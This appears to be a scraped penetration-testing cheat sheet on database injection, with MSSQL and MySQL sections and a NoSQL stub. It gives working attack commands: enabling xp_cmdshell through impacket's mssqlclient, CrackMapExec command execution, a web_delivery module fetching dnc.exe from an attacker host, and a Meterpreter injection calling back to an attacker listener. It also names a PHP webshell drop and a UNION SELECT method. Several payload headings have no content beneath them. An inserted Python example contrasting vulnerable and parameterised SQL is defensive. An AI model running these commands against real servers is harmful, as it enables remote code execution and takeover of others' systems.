Database Injection & Exploitation

Microsoft SQL

xp_cmdshell

This lets you execute commands on the system. Pretty straightforward. You need valid credentials.

python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py -windows-auth <domain>/<user>@10.129.95.187
#Check if xp_cmdshell is available
SQL> xp_cmdshell()
#IF NOT
SQL> EXEC sp_configure 'xp_cmdshell', '1'
SQL> RECONFIGURE

CrackMapExec

crackmapexec mssql <target-ip> -u <user> -p <password> -x {cmd}

CrackMapExec - Web Delivery

crackmapexec mssql <target-ip> -u <user> -p <pass> -M web_delivery -o URL=http://<attacker-ip>:8080/dnc.exe

CrackMapExec - Shell injection

crackmapexec mssql <target-ip> -u <user> -p <pass> -M met_inject -o LHOST=<attacker-ip> LPORT=4444

Metasploit mssql_payload

Get a meterpreter.

MySQL

MySQL is one of the most used RDBMS out there, and many web applications still suffer from SQL injection attacks. The attack simply consists of passing arbitrary input to a query that is built by a miscoded parsing routine.

If user input is not validated and sanitized before it reaches the back-end database query, the consequences range from data leaks to remote code execution.
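To make the point concrete, here is an added example (not from the original page) that contrasts a login check which concatenates user input into the query with a parameterised one. It uses Python's sqlite3 module as a stand-in for a MySQL back end so that it runs offline; the table and credentials are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed in-memory database standing in for the MySQL back end
    # (sqlite3 is an assumption made so the example runs offline).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # User input is concatenated straight into the statement, so quote
    # characters in the input are parsed as SQL syntax rather than data.
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone()[0] > 0


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: the driver passes the values separately from the
    # statement text, so input can never change the statement's structure.
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def compare(username: str, password: str) -> tuple:
    # Returns (vulnerable_result, hardened_result) for the same input so the
    # difference between the two implementations is visible side by side.
    conn = make_db()
    try:
        return login_vulnerable(conn, username, password), login_hardened(conn, username, password)
    finally:
        conn.close()


if __name__ == "__main__":
    print("valid credentials:", compare("alice", "s3cret"))
    print("quote-breaking input:", compare("alice' OR '1'='1", "wrong"))
```

With valid credentials both functions return True; with the quote-breaking username only the concatenated version returns True, because the injected OR clause rewrites the WHERE condition.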

Quick PHP WebShell

This writes a shell that takes cmd as a variable into /var/www/html/shell.php.

UNION SELECT - Basic example and methodology

  1. Find a vulnerable param with quotes/comments

  2. Find how many columns in response from query

  3. Find how many tables

  4. Find how many columns

  5. Enumerate rows

  6. Profit

NoSQL

NoSQL (short for "non SQL" or "not only SQL") refers to a non-relational database: a system for storing and retrieving data. NoSQL databases are commonly used nowadays for big data and IoT devices because of features such as fast queries, ease of use for developers, easy scaling, and a flexible data structure.

Modify HTTP request

Payloads

Generic payloads

Generic error based

Generic Time Based SQL Injection Payloads

Generic Union Select

SQL Injection Auth Bypass Payloads
